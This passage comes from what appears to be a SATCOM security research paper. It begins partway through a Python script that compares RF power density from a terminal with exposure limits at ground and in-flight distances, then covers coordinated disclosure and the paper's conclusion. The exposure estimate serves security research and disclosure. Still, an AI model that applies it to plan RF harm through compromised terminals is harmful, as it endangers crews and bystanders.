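    e = e_field_v_m(s)
    return {"pfd_mw_cm2": s, "over_mpe": s > MPE_UNCONTROLLED,
            "e_v_m": e, "sources_for_limit": sources_to_exceed(e)}


if __name__ == "__main__":
    EIRP_W = 1810.0  # constructed value, not a device specification
    print("far field starts at %.2f m" % far_field_start_m(0.65, 30e9))
    for label, d in (("ground, 12 m", 12.0), ("in flight, 1000 ft", 304.8)):
        print(label, assess(EIRP_W, d))
```

With these constructed inputs the 12 m case comes out near 0.1 mW/cm² and about ten in-phase sources, and the 1000 ft case in the hundreds, the same orders of magnitude the section reports.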

Responsible Disclosure

IOActive followed the responsible disclosure standards, trying to coordinate with all the involved authorities, organizations, and companies affected. Since November 2017 we have reported these issues to EASA, EU-CERT, US-CERT, and ICS-CERT and some of the affected vendors. Unfortunately, we did not receive the expected collaboration in certain cases.

This has been one of the most complex scenarios for a coordinated disclosure, so we would like to thank Peter Lemme, chairman of ARINC 791, for his commitment to independently evaluate these issues [45], as well as A-ISAC [46] for providing their collaboration and valuable feedback.

We can confirm that the affected airlines are no longer exposing their fleets to the Internet. We do not have any further information about the remaining issues described in this paper.

[45] http://www.satcom.guru/2018/02/malfunction-in-aero-kuka-band-satcom.html
[46] https://www.a-isac.com/

Conclusion

“A Wake-Up Call For SATCOM Security” was published at BlackHat in 2014. This research got attention from multiple actors across different sectors and media outlets, thus breaking the intrinsic barriers that delimit our security industry. We consider this outcome a tremendous success derived from a niche research initiative. As a result, important companies around the SATCOM industry became aware of the potential threats derived from SATCOM-based attacks and the need to secure their assets. At IOActive we are proud to be helping some of them to take the proper actions along that journey.

In the previous research, we theorized potential scenarios attackers could exploit once SATCOM terminals have been compromised in three main sectors: Aviation, Maritime, and Military. This current research maintained the focus on these sectors as the main targets for potential attacks, because the circumstances have not substantially changed. Demonstrating that some of the theoretical scenarios presented in 2014 were, in fact, possible is the motivation that has kept this research alive.

The technologies that have been covered in this paper have a significant impact on society, for good. It is everyone's responsibility to keep it that way, as the alternative scenario, where safety risks are possible, is certainly not an option.

About IOActive

IOActive is a comprehensive, high-end information security services firm with a long and established pedigree in delivering elite security services to its customers. Our world-renowned consulting and research teams deliver a portfolio of specialist security services ranging from penetration testing and application code assessment through to semiconductor reverse engineering. Global 500 companies across every industry continue to trust IOActive with their most critical and sensitive security issues. Founded in 1998, IOActive is headquartered in Seattle, USA, with global operations through the Americas, EMEA and Asia Pac regions. Visit www.ioactive.com for more information. Read the IOActive Labs Research Blog: http://blog.ioactive.com/. Follow IOActive on Twitter: http://twitter.com/ioactive.
